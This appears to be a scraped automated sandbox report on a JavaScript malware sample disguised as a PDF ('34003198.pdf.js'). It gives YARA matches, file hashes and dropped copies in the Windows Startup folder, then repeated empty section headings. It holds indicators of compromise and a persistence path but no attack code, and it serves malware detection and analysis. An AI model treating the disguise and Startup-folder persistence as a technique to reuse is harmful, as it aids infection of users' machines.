Source: Yara match	File source: amsi64_3052.amsi.csv, type: OTHER
Source: Yara match	File source: amsi64_2108.amsi.csv, type: OTHER
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000003.1717094086.00000204EDD11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2052217166.000001B0667E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1732635440.00000204E96D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1895477782.0000020BE1A81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2075840679.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1732046092.00000204E96D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2044832701.000001B066B5B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1946740186.00000221C1074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1948124676.00000221C10C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1756338470.0000020BE1DFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716943117.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1939972889.00000221C11A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1895073011.0000020BE1D16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894450811.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1717820374.00000204ED0E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1733013257.00000204E96D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1961308985.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894678392.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707066216.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734499646.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2051877056.000001B066C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1939694643.00000221C0FD1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2074574369.00000221C10A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2053586111.000001B065B93000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716028940.00000204EE000000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2051515691.000001B066DEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1733327075.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1734834487.00000204E96DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2052217166.000001B066887000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1894927688.0000020BE1D09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707419041.00000204EDF11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1899732633.0000020BE1EEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1716743000.00000204EE31A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1707269284.00000204EE0E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 4108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 3168, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 3052, type: MEMORYSTR

ID:	1428759
Product:	CloudBasic
Start time:	15:26:53
Start date:	19.04.2024
Sample:	34003198.pdf.js
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	6812d6fba47adabb337563ca20fa84f8
SHA1:	2ab5b312c71f2a60d53c16fad7690291ea6d5bb0
SHA256:	6ac96e55099f4737d755e8caa4a03a4ad47faec1e7d133c3eb67c9a7057cd574

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Roaming\34003198.pdf.js	ASCII text, with very long lines (65536), with no line terminators	6812D6FBA47ADABB337563CA20FA84F8	2AB5B312C71F2A60D53C16FAD7690291EA6D5BB0	6AC96E55099F4737D755E8CAA4A03A4AD47FAEC1E7D133C3EB67C9A7057CD574
C:\Users\user\AppData\Roaming\34003198.pdf.js:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js	ASCII text, with very long lines (65536), with no line terminators	6812D6FBA47ADABB337563CA20FA84F8	2AB5B312C71F2A60D53C16FAD7690291EA6D5BB0	6AC96E55099F4737D755E8CAA4A03A4AD47FAEC1E7D133C3EB67C9A7057CD574
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\34003198.pdf.js:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bCdHGOcGLp.js	ASCII text, with very long lines (8120), with CRLF line terminators	EF0B971AE6F0713AD41A7774539BB787	30E622C882A4E44B193D36C1A81D78850FE70C00	62563B71EED9B8356F69BF8BA95E4664D6F936E485975D19CB04E7F456495FD3
C:\Users\user\AppData\Roaming\bCdHGOcGLp.js	ASCII text, with very long lines (8120), with CRLF line terminators	EF0B971AE6F0713AD41A7774539BB787	30E622C882A4E44B193D36C1A81D78850FE70C00	62563B71EED9B8356F69BF8BA95E4664D6F936E485975D19CB04E7F456495FD3

Windows Analysis Report
34003198.pdf.js

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report 34003198.pdf.js

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
34003198.pdf.js

Malware Threat Intel
Provided by